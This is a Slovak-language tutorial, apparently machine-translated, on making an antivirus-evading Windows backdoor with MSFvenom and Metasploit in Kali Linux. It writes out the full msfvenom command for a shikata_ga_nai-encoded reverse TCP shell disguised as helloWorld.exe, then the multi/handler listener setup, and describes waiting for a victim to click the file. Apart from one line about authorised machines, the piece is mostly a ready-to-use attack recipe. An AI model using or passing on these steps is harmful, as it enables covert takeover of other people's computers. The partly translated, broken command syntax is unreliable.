Ako vytvoriť takmer neodhaliteľný backdoor pomocou MSFvenom v Kali Linuxe

Zadné vrátka sa používajú na obchádzanie bezpečnostných mechanizmov, často tajne a väčšinou nezistiteľne. Pomocou MSFvenom, kombinácie msfpayload a msfencode, je možné vytvoriť backdoor, ktorý sa pomocou reverzného shellu TCP pripojí späť k útočníkovi. Aby ste mohli vytvoriť backdoor, musíte zmeniť signatúru škodlivého softvéru, aby sa vyhol akémukoľvek antivírusovému softvéru. Dokončite tento projekt na dvojici počítačov, ku ktorým máte oprávnenie na prístup, a počas tohto procesu sa dozviete viac o zabezpečení počítačov a o tom, ako tento druh zadných dverí funguje.

Kroky

Spustite aplikáciu Kali a spustite konzolu Terminál.

Zadajte adresu ifconfig na zobrazenie rozhrania a skontrolujte svoju adresu IP.

Typ msfvenom -l kódovanie aby sa zobrazil zoznam kódovačov.

  • Budete používať x86/shikata_ga_nai ako kódovač.



Zadajte „msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b „\x00“ -e x86/shikata_ga_nai -f exe > helloWorld.exe

  • -a x86 --platforma windows označuje architektúru, ktorá sa má použiť.
  • -p windows/shell/reverse_tcp označí užitočné zaťaženie, ktoré sa má vložiť.
  • LHOST označí IP adresu poslucháča.
  • LPORT určuje port poslucháča.
  • -b "\x00" označuje, aby sa zabránilo zlému znaku (nulové bajty).
  • -e x86/shikata_ga_nai označuje názov kódovača.
  • -f exe > HelloWorld.exe označuje výstupný formát.

Zadajte msfconsole aktivovať Metasploit.

  • Teraz ste si vygenerovali zadné vrátka. Keď obeť klikne na helloWorld.exe, vložené užitočné zaťaženie shellu sa aktivuje a nadviaže spojenie so systémom. Aby ste mohli prijať spojenie, musíte otvoriť multi-handler v aplikácii Metasploit a nastaviť užitočné zaťaženie.

Typ Použite exploit/multi/handler.

Typ set payload windows/shell/reverse_tcp.

Typ Zobraziť možnosti Kontrola modulu.

Zadajte nastavte LHOST 192.168.48.129.

  • „LHOST“ označuje IP adresu poslucháča.

Zadajte nastavte LPORT 4444.

  • „LPORT“ označuje port poslucháča.

Typ Spustite stránku a počkajte na pripojenie zo stroja obete.

  • Počkajte, kým obeť klikne na helloWorld.exe. Potom budete úspešne pripojení k počítaču obete.
  • Odkazy

    1. OCCUPYTHEWEB. Metasploit pre začínajúcich hackerov, časť 5 (Msfvenom). zo stránky http://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-5-msfvenom-0159520/
    2. thelightcosine. Podivný pár: Metasploit a antivírusové riešenia (13. decembra 2012). z adresy https://community.rapid7.com/community/metasploit/blog/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions